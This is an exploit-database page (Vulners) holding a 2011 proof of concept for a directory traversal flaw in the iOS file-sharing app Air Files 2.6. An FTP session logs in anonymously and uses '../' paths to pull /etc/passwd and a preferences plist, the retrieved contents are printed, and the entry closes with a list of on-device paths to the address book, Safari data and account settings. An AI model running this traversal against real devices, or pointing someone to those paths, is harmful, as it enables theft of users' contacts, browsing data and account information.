Vulners
Lucene search
iSO Air Files 2.6 - Directory Traversal
# Exploit Title: Air Files v2.6 for iPhone / iPod touch, Directory Traversal
# Date: 02/24/2011
# Author: R3d@l3rt, Sunlight, H@ckk3y
# Software Link : http://itunes.apple.com/kr/app/filer-lite-download-view-manage/id339732484?mt=8
# Version: 2.6
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware
# There is directory traversal vulnerability in the Air Files.
# Exploit Testing
C:\>ftp
ftp> open 192.168.0.70 2100
Connected to 192.168.0.70.
220 DiddyFTP server ready.
User (192.168.0.70:(none)): anonymous
331 Password required for anonymous
Password:
230 User anonymous logged in.
ftp> dir
200 PORT command successful.
150 Opening ASCII mode data connection for '/bin/ls'.
total 5
drwxr-xr-x 1 mobile mobile 68 Jan 06 13:26 Document
drwxr-xr-x 1 mobile mobile 68 Jan 06 13:26 Movie
drwxr-xr-x 1 mobile mobile 68 Jan 06 13:26 Music
drwxr-xr-x 1 mobile mobile 68 Jan 06 13:26 Picture
-rw-r--r-- 1 mobile mobile 22 Jan 06 17:02 archive.zip
226 Transfer complete.
ftp: 327 bytes received in 0.00Seconds 327000.00Kbytes/sec.
ftp> get ../../../../../etc/passwd
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../etc/passwd'.
226 Transfer complete.
ftp: 787 bytes received in 0.00Seconds 787000.00Kbytes/sec.
ftp> get ../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist
200 PORT command successful.
150 Opening BINARY mode data connection for '../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'.
226 Transfer complete.
ftp: 272 bytes received in 0.00Seconds 272000.00Kbytes/sec.
ftp> quit
C:\>type passwd
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file. Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false
C:\>type com.apple.conference.plist
bplist00?_restoredFromBackup\natTypeCache?
_DIPv4.Router=192.168.0.1;IPv4.RouterHardwareAddress=1c:bd:b9:XX:XX:XX_EIPv4.R
outer=192.168.11.1;IPv4.RouterHardwareAddress=00:24:a5:XX:XX:XX? XnatFlag
C:\>
# IPhone inside information
1. Phone Book
- /private/var/mobile/Library/AddressBook/AddressBook.sqlitedb
2. Safari Favorites List
- /private/var/mobile/Library/Safari
3. Users E-mail Information
- /private/var/mobile/Library/Preferences/com.apple.accountsettings.plist
4. IPv4 Router Information
- /private/var/mobile/Library/Preferences/com.apple.conference.plist
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1